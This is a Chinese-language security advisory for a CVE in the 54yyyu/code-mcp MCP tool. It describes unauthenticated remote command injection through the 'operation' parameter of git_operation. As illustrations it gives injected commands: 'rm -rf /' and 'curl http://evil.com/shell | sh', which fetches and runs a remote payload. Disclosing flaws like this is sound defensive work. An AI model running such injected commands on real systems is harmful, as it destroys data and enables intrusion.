CVE-2026-781254yyyu/code-mcp 项目是一个持续交付的工具,其 MCP Tool 组件存在严重安全漏洞。漏洞位于 `src/code_mcp/server.py` 文件的 `git_operation` 函数中,由于对用户输入的 `operation` 参数缺乏有效的清洗机制,导致攻击者可构造恶意payload实施远程命令注入攻击。利用该漏洞无需用户交互或认证,可能导致系统机密性、完整性和可用性受损。目前漏洞利用细节已公开,但官方尚未发布修复版本。
该漏洞属于典型的操作系统命令注入漏洞。在 `54yyyu/code-mcp` 项目的 `src/code_mcp/server.py` 文件中,`git_operation` 函数负责处理与 git 相关的操作。代码逻辑中存在严重缺陷,直接将用户通过 API 或接口传入的 `operation` 参数拼接进操作系统命令行进行执行,而未进行严格的输入验证、过滤或使用参数化执行机制。这意味着攻击者可以注入恶意的 Shell 命令。例如,通过在参数末尾添加分号、管道符或逻辑连接符(如 `;`、`|`、`&&`),后接 `rm -rf /` 或 `curl http://evil.com/shell | sh` 等命令,服务器会在执行 git 操作的同时执行攻击者的任意指令。由于 CVSS 评分为 7.3 且向量为 `AV:N/AC:L/PR:N/UI:N`,表明该漏洞可被未认证的攻击者通过网络远程利用,且利用难度较低,对服务器安全构成严重威胁。